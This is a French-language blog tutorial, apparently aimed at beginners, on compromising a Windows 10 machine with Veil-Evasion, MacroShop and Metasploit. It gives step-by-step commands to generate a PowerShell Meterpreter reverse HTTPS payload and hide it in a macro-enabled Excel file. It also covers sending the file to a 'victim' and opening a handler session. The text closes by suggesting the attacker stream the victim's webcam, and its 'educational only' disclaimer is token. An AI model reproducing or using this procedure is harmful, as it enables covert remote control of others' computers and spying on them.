Hack Windows 10 avec Veil-Evasion et Metasploit

Ce tutoriel est proposé a titre éducatif uniquement, nous ne serons pas tenu pour responsable de vos actes.

Salut les amis! ? Nous allons voir aujourd’hui comment utiliser quelques outils sous Kali 2.0!

Pour commencer: ouvrir le terminal puis tapez les lignes suivantes pour installer veil-evasion et MacroShop

-apt-get install veil-evasion

-git clone https://github.com/khr0x40sh/MacroShop.git

Une fois les outils installer nous allons pouvoir creer notre PAYLOAD avec veil,

pour ce, lancer veil-evasion:

-veil-evasion

-use

Puis selectionner le payload  « powershell/meterpreter/rev_https » (le n°23 pour moi) en tapant son numéro.

On va ouvrir une 2eme fenêtre dans laquelle nous allons taper la commande:

-ifconfig

Qui va nous permettre de récupérer notre adresse ip qui servira a paramétrer notre payload, donc on copie notre ip puis on retourne sur la fenêtre de veil et on tape:

-set LHOST « notre_ip » (il faudra bien évidement faire un coller de votre ip préalablement copier !)

-generate

Puis on rentre le nom du Payload que l’on vient de créer.

Copier le chemin du PAYLOAD File, elle nous servira juste après. (généralement var/lib/veil-evasion/output/source/nomDuFichier.bat)

On quitte veil.

-exit

puis on rentre dans le dossier MacroShop

-cd MacroShop

ensuite il nous faut taper python macro_safe.py / « le chemin du PAYLOAD File » / le fichier renomer:

-python macro_safe.py  var/lib/veil-evasion/output/source/nomDuFichier.bat nomDuFichier.txt

ce qui nous creer un fichier txt dans le dossier MacroShop.

A partir de maintenant il va nous falloir utiliser Excel du pack office donc la meilleur méthode est d’utiliser une machine virtuelle pour faire ce genre de manipulation, pour ma part j’ai installer windows 10 version éducation .

Donc on envois, par mail, usb peu importe notre fichier texte que l’on vient juste de créer, sur une machine windows 10 et on ouvre excel:

une foi dans excel il faut aller dans l’onglet développeur, si celui si n’est pas disponible :

Fichier > Options > Personnaliser le ruban puis cocher la case développeur.

Dans l’onglet développeur cliquez qur Visual Basic en haut à gauche puis ouver le workbook en double cliquant dessus, copiez ensuite le contenu du fichié texte pour les coller dans le workbook. Enregistrez ensuite le workbook avec le type:

-classeur excel prenant en charge les macros.

Notre fichier et presque prêt !  Il nous faut activer l’écoute avnt que notre victime ne l’ouvre.

on retourne sur notre session kali, puis on rentre sur le terminal la commande suivante:

-msfconsole

Ce qui vas nous permettre d’ouvrir la console metasploit grâce a laquelle nous allons pouvoir interagir avec le pc de notre victime…

on commence par activer notre PAYLOAD:

-use exploit/multi/handler

Puis,

-set PAYLOAD windows/meterpreter/reverse_https

-set LHOST « notre ip » (que l’on peu avoir je vous le rappel grâce a la commande ifconfig)

-set ExitOnSession false

-exploit -j

Voila nous n’avons plus qu’a attendre que notre victime ouvre le fichier excel ,

puis taper la commande :

-sessions -i 1 ( 1 parce que une seul session d’ouverte !)

une nouvelle session meterpreter s’ouvre, s’a y est vous êtes sur le pc de votre victime !

Vous pouvez par exemple essayer un :

-webcam_stream

Pour voir ce qui ce passe à la webcam 😉

Sinon jeunes padawans, si vous avez windows powershell qui tourne en tache de font sur votre gestionnaire de tache alors que vous ne l’avez pas ouvert, je vous recommande fortement de nettoyer votre ordinateur !

allez amusez vous bien pas trop de bêtises 🙂

 

 

 

 

 

 

 

 

Publicités